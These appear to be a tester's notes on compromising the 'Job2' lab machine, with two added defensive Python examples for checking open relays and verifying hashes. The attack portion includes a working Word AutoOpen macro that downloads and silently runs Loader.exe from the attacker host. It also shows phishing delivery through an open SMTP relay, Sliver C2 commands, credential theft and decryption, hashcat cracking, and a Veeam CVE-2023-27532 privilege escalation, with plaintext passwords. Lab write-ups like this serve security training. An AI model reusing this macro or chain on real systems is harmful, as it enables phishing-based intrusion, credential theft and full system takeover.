Job2

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows 2016

Chain: False (standalone compromise)

Credentials

Username                  Password        Method                   Scope
------------------------  --------------  -----------------------  ------------------------
Mailserver Administrator  MailAdm1n2023                            hMailServer
                          95C02068FD5D    Decrypt hash             Database for hMailServer
Ferdinand                 Franzi123!      Extracted from Database  Local User

✅ Valid Usernames

Ferdinand

🔑 Passwords list

MailAdm1n2023
95C02068FD5D
Franzi123!

Information Gathering

22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
80/tcp   open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open  rpcbind       syn-ack ttl 127
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp  open  microsoft-ds? syn-ack ttl 127
1063/tcp open  rpcbind       syn-ack ttl 127
2049/tcp open  rpcbind       syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Service enumeration

SMTP

The service is vulnerable to open relay, which means any unauthenticated user can send emails through it to arbitrary destinations.

❯ nmap -p25 -Pn --script smtp-open-relay 10.10.95.231
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 15:34 EDT
Nmap scan report for 10.10.95.231
Host is up (0.16s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
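The same check, as an added example that is not part of the original notes, written the way an administrator would self-test a mail server: it replays only the envelope part of the transaction that appears later in the sendemail log (EHLO, MAIL FROM, RCPT TO) with a sender and a recipient that are both foreign to the server, then sends RSET and never reaches DATA, so nothing is queued. A 2xx reply to RCPT TO for a recipient the server is not responsible for is the relay signal. The ScriptedSession class, the probe addresses and the function names are constructed for this example; the live path uses the standard smtplib API.

```python
"""Open-relay self-check for an SMTP server (envelope only, nothing is sent)."""
import smtplib
from typing import Optional, Tuple

# Both addresses are deliberately outside any domain the tested server hosts.
PROBE_SENDER = "relaycheck@example.com"
PROBE_RECIPIENT = "relaycheck@example.net"


def check_open_relay(session, sender: str = PROBE_SENDER,
                     recipient: str = PROBE_RECIPIENT) -> dict:
    """Run the envelope-only probe over an smtplib.SMTP-like session.

    `session` needs ehlo(), mail(), rcpt() and rset(), each returning
    (code, message) as smtplib.SMTP does; the caller connects and closes.
    """
    code, _ = session.ehlo("relaycheck.invalid")
    if code != 250:
        raise RuntimeError(f"EHLO rejected with code {code}")
    mail_code, _ = session.mail(sender)
    rcpt_code: Optional[int] = None
    if 200 <= mail_code < 300:
        rcpt_code, _ = session.rcpt(recipient)
    session.rset()  # abandon the envelope; DATA is never issued
    return {
        "relay": rcpt_code is not None and 200 <= rcpt_code < 300,
        "mail_code": mail_code,
        "rcpt_code": rcpt_code,
    }


class ScriptedSession:
    """Constructed stand-in for smtplib.SMTP that answers with fixed codes.

    The defaults mirror the replies in the notes' log (250 to MAIL FROM and
    RCPT TO); pass rcpt_code=550 to model a server that refuses to relay.
    """

    def __init__(self, mail_code: int = 250, rcpt_code: int = 250):
        self.mail_code, self.rcpt_code = mail_code, rcpt_code
        self.transcript = []

    def ehlo(self, name: str = "") -> Tuple[int, bytes]:
        self.transcript.append(f"EHLO {name}")
        return 250, b"JOB2\nSIZE 20480000\nAUTH LOGIN\nHELP"

    def mail(self, sender: str, options=()) -> Tuple[int, bytes]:
        self.transcript.append(f"MAIL FROM:<{sender}>")
        return self.mail_code, b"OK"

    def rcpt(self, recip: str, options=()) -> Tuple[int, bytes]:
        self.transcript.append(f"RCPT TO:<{recip}>")
        reply = b"OK" if self.rcpt_code < 300 else b"Relaying not allowed"
        return self.rcpt_code, reply

    def rset(self) -> Tuple[int, bytes]:
        self.transcript.append("RSET")
        return 250, b"OK"


def check_host(host: str, port: int = 25, timeout: float = 10.0) -> dict:
    """Probe a live server; the context manager handles connect and QUIT."""
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        return check_open_relay(smtp)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        verdict = check_host(sys.argv[1])
    else:
        # Offline demo with the scripted replies from the notes.
        verdict = check_open_relay(ScriptedSession())
    print("OPEN RELAY" if verdict["relay"] else "relay refused", verdict)
```

Run it with the server's address as the only argument; without an argument it runs against the scripted session. The fix on the server side is to restrict relaying to authenticated sessions or to the networks that legitimately submit mail, after which the RCPT TO step returns a 5xx code and the verdict flips.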

HTTPS (www.job2.vl)

Possible Attack Path: If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document. We look forward to hearing from you!

Initial Access

During the assessment, the tester configured a Sliver server and generated a beacon named http-vulnlabs-4444.exe for use throughout the assessment.

Setting up Macro for MS Word

It was discovered that an AV engine running on the system was blocking everything. The tester proceeded to use to bypass and obtain a reverse shell.

' Win32 API imports used by the macro: URLDownloadToFileA fetches a file over HTTP
' and WinExec launches it. This download-and-run pair is the classic pattern that
' AV/EDR macro scanners and mail gateways look for in Office documents.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

' SW_HIDE: start the process without a visible window. Declared here because the
' macro as posted used the name without defining it.
Private Const SHOW_HIDE As Long = 0

Sub AutoOpen()
    ' AutoOpen runs as soon as the document is opened with macros enabled.
    URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub

Sending the malicious file via the sendemail tool

❯ sendemail -t hr@job2.vl -f john.smith@gmail.com -a pay.doc -u "Subject: Appliction Resume" -s 10.10.89.165 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

May 06 18:25:35 kali sendemail[185144]: Message input complete.
May 06 18:25:35 kali sendemail[185144]: DEBUG => Connecting to 10.10.89.165:25
May 06 18:25:35 kali sendemail[185144]: DEBUG => My IP address is: 10.8.5.48
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	220 JOB2 ESMTP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	EHLO kali
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	250-JOB2, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	MAIL FROM:<john.smith@gmail.com>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	RCPT TO:<hr@job2.vl>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	DATA
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	354 OK, send.
May 06 18:25:36 kali sendemail[185144]: INFO => Sending message body
May 06 18:25:36 kali sendemail[185144]: Setting content-type: text/plain
May 06 18:25:36 kali sendemail[185144]: DEBUG => Sending the attachment [pay.doc]
May 06 18:25:38 kali sendemail[185144]: SUCCESS => Received: 	250 Queued (1.484 seconds)
May 06 18:25:38 kali sendemail[185144]: Email was sent successfully!  From: <john.smith@gmail.com> To: <hr@job2.vl> Subject: [Subject: Appliction Resume] Attachment(s): [pay.doc] Server: [10.10.89.165:25]

Lateral movement to Ferdinand

Performing Situational Awareness

sliver (http-vulnlabs-4444) > sa-whoami 

[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:

UserName		SID
====================== ====================================
JOB2\Julian	S-1-5-21-3935782767-3829597994-1046841959-1000


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
JOB2\None                                         Group                    S-1-5-21-3935782767-3829597994-1046841959-513 Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Remote Desktop Users                      Alias                    S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Users                                     Alias                    S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\INTERACTIVE                          Well-known group         S-1-5-4                                       Mandatory group, Enabled by default, Enabled group, 
CONSOLE LOGON                                     Well-known group         S-1-2-1                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\This Organization                    Well-known group         S-1-5-15                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Local account                        Well-known group         S-1-5-113                                     Mandatory group, Enabled by default, Enabled group, 
LOCAL                                             Well-known group         S-1-2-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\NTLM Authentication                  Well-known group         S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\Medium Mandatory Level            Label                    S-1-16-8192                                   Mandatory group, Enabled by default, Enabled group, 


Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled                       
SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled                      


sliver (http-vulnlabs-4444) >  

Enumerating the security solutions

sliver (http-vulnlabs-4444) > execute -o cmd "/c powershell Get-MPComputerStatus | findstr True"

[*] Output:
AMServiceEnabled                 : True
AntispywareEnabled               : True
AntivirusEnabled                 : True
BehaviorMonitorEnabled           : True
IoavProtectionEnabled            : True
IsVirtualMachine                 : True
NISEnabled                       : True
OnAccessProtectionEnabled        : True
QuickScanOverdue                 : True
RealTimeProtectionEnabled        : True

sliver (http-vulnlabs-4444) >  

Discovering unusual installed software

sliver (http-vulnlabs-4444) > ls

C:\Progra~2 (25 items, 174 B)
=============================
drwxrwxrwx  AWS SDK for .NET                      <dir>  Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx  AWS Tools                             <dir>  Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx  Common Files                          <dir>  Wed May 03 18:47:14 +0000 2023
-rw-rw-rw-  desktop.ini                           174 B  Sat May 08 08:18:31 +0000 2021
drwxrwxrwx  hMailServer                           <dir>  Wed May 03 13:48:57 +0000 2023
drwxrwxrwx  Internet Explorer                     <dir>  Wed Dec 15 04:19:46 +0000 2021
drwxrwxrwx  LINQPad5                              <dir>  Wed May 03 14:05:02 +0000 2023
drwxrwxrwx  Microsoft                             <dir>  Thu Aug 19 06:41:12 +0000 2021
drwxrwxrwx  Microsoft Office                      <dir>  Wed May 03 15:15:38 +0000 2023
drwxrwxrwx  Microsoft OneDrive                    <dir>  Tue May 02 21:20:00 +0000 2023
drwxrwxrwx  Microsoft SQL Server                  <dir>  Wed May 03 18:15:45 +0000 2023
drwxrwxrwx  Microsoft SQL Server Compact Edition  <dir>  Wed May 03 14:08:26 +0000 2023
drwxrwxrwx  Microsoft Synchronization Services    <dir>  Wed May 03 13:49:01 +0000 2023
drwxrwxrwx  Microsoft Visual Studio 14.0          <dir>  Wed May 03 18:11:58 +0000 2023
drwxrwxrwx  Microsoft.NET                         <dir>  Wed May 03 18:15:54 +0000 2023
drwxrwxrwx  MSBuild                               <dir>  Wed May 03 13:43:58 +0000 2023
drwxrwxrwx  Reference Assemblies                  <dir>  Wed May 03 13:43:58 +0000 2023
drwxrwxrwx  Veeam                                 <dir>  Wed May 03 18:47:42 +0000 2023
drwxrwxrwx  Windows Defender                      <dir>  Sat May 08 09:35:34 +0000 2021
drwxrwxrwx  Windows Mail                          <dir>  Wed Mar 15 06:46:55 +0000 2023
drwxrwxrwx  Windows Media Player                  <dir>  Wed Jul 13 08:03:39 +0000 2022
drwxrwxrwx  Windows NT                            <dir>  Sat May 08 09:35:34 +0000 2021
drwxrwxrwx  Windows Photo Viewer                  <dir>  Thu Feb 10 00:28:44 +0000 2022
drwxrwxrwx  Windows Sidebar                       <dir>  Sat May 08 08:34:49 +0000 2021
drwxrwxrwx  WindowsPowerShell                     <dir>  Sat May 08 08:34:49 +0000 2021


sliver (http-vulnlabs-4444) >  
  • LINQPad 5 is a powerful software utility specifically designed for .NET Framework 4.6 development, allowing developers to interactively query SQL databases and write C# code without needing a full IDE.

  • hMailServer is a free, open source, e-mail server for Microsoft Windows. It's used by Internet service providers, companies, governments, schools and enthusiasts in all parts of the world.

  • Veeam is a software company specializing in data protection, backup, and disaster recovery solutions for various workloads, including virtual, physical, cloud-based, and SaaS environments.

Discovering credentials on Julian's Desktop

sliver (http-vulnlabs-4444) > ls

C:\Users\Julian\Desktop (3 items, 2.8 KiB)
==========================================
-r--r--r--  creds.txt      39 B     Wed May 03 15:38:10 +0000 2023
-rw-rw-rw-  desktop.ini    282 B    Wed May 03 16:28:26 +0000 2023
-rw-rw-rw-  Word 2016.lnk  2.5 KiB  Thu May 04 10:43:29 +0000 2023


sliver (http-vulnlabs-4444) > cat creds.txt

Mailserver Administrator: MailAdm1n2023

Credentials found: Mailserver Administrator: MailAdm1n2023

Obtaining the hMailServer configuration file

sliver (http-vulnlabs-4444) > cat hMailServer.INI

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

sliver (http-vulnlabs-4444) >  

Hash found: 4e9989caf04eaa5ef87fd1f853f08b62

Downloading Database file

sliver (http-vulnlabs-4444) > download hMailServer.sdf

[*] Wrote 675840 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/hMailServer.sdf

Decrypting database password

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/hmailserver_password.exe

[*] Wrote file to C:\Temp\hmailserver_password.exe

sliver (http-vulnlabs-4444) > execute -o hmailserver_password.exe dec 4e9989caf04eaa5ef87fd1f853f08b62

[*] Output:
95C02068FD5D

sliver (http-vulnlabs-4444) >  

Password: 95C02068FD5D

Extracting users' hashes from the Database

Bruteforcing and obtaining Ferdinand's Password

❯ hashid 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
Analyzing '04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11'
[+] hMailServer 


❯ hashcat -m 1421 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11 /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11:Franzi123!

Ferdinand@job2.vl: Franzi123!
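To show why hashid labels this value "hMailServer" and why hashcat mode 1421 cracks it so quickly, here is an added example (not from the notes, and not hMailServer's own code) that parses and verifies a hash of this kind. It assumes the layout that hashcat mode 1421 implements: 70 hex characters, of which the first 6 are an ASCII salt and the remaining 64 are the hex SHA-256 of salt followed by password. That layout is stated here as this editor's understanding of the format; the function names and the constructed sample password are this example's own.

```python
"""Parse and verify hMailServer-style password hashes (salt + sha256(salt||pw))."""
import hashlib
import secrets
from typing import Optional, Tuple

SALT_LEN = 6      # hex characters of salt prefixed to the digest
DIGEST_LEN = 64   # hex characters of a SHA-256 digest
HEX = set("0123456789abcdef")

# Hash copied from the notes above; the password the notes recovered is "Franzi123!".
NOTES_HASH = "04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11"


def split_hash(stored: str) -> Tuple[str, str]:
    """Return (salt, digest) for a stored value, rejecting anything that is not 70 hex chars."""
    stored = stored.strip().lower()
    if len(stored) != SALT_LEN + DIGEST_LEN or not set(stored) <= HEX:
        raise ValueError("not a 70-hex-character hMailServer hash")
    return stored[:SALT_LEN], stored[SALT_LEN:]


def make_hash(password: str, salt: Optional[str] = None) -> str:
    """Build a stored value the same way: random 6-hex salt, then sha256(salt + password)."""
    if salt is None:
        salt = secrets.token_hex(SALT_LEN // 2)  # 3 random bytes -> 6 hex chars
    if len(salt) != SALT_LEN or not set(salt) <= HEX:
        raise ValueError("salt must be 6 hex characters")
    digest = hashlib.sha256((salt + password).encode("utf-8")).hexdigest()
    return salt + digest


def verify(stored: str, candidate: str) -> bool:
    """True if `candidate` produces `stored` under the assumed scheme."""
    salt, digest = split_hash(stored)
    computed = hashlib.sha256((salt + candidate).encode("utf-8")).hexdigest()
    return secrets.compare_digest(computed, digest)


if __name__ == "__main__":
    salt, digest = split_hash(NOTES_HASH)
    print(f"salt={salt} digest={digest}")
    print("Franzi123! matches:", verify(NOTES_HASH, "Franzi123!"))
    # Constructed sample: a fresh hash for a made-up password, then a check both ways.
    sample = make_hash("correct horse battery")
    print(sample, verify(sample, "correct horse battery"), verify(sample, "wrong"))
```

The salt only prevents precomputed tables; each guess still costs a single SHA-256, which is why a rockyou run finishes in seconds as the notes show. On the defensive side that argues for long passphrases on mail accounts and for treating hMailServer.sdf (and the INI that holds its decryptable password) as secrets protected by file ACLs and backup encryption.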

Privilege Escalation to NT Authority System

Lateral movement to Ferdinand user

sliver (http-vulnlabs-4444) > make-token --username Ferdinand -p 'Franzi123!' -T LOGON_NETWORK


[*] Successfully impersonated \Ferdinand. Use `rev2self` to revert to your previous token.
sliver (http-vulnlabs-4444) > whoami

Logon ID: JOB2\Julian
[*] Current Token ID: JOB2\Ferdinand
sliver (http-vulnlabs-4444) >  

Obtaining the vulnerable Veeam version

Exploit: CVE-2023-27532

sliver (http-vulnlabs-4444) > execute -o cmd '/c powershell Get-Package | findstr Veeam' 

[*] Output:
Veeam Backup & Replication     10.0.1.4854

Uploading the exploit and dependencies.

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/VeeamHax.exe

[*] Wrote file to C:\Temp\VeeamHax.exe

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Interaction.MountService.dll

[*] Wrote file to C:\Temp\Veeam.Backup.Interaction.MountService.dll

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Model.dll

[*] Wrote file to C:\Temp\Veeam.Backup.Model.dll

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Common.dll

[*] Wrote file to C:\Temp\Veeam.Backup.Common.dll

Exploiting the vulnerability to obtain a shell as NT Authority System

sliver (http-vulnlabs-4444) >  execute VeeamHax.exe --target 127.0.0.1 --cmd "C:\Windows\system32\spool\drivers\color\Loader.exe"
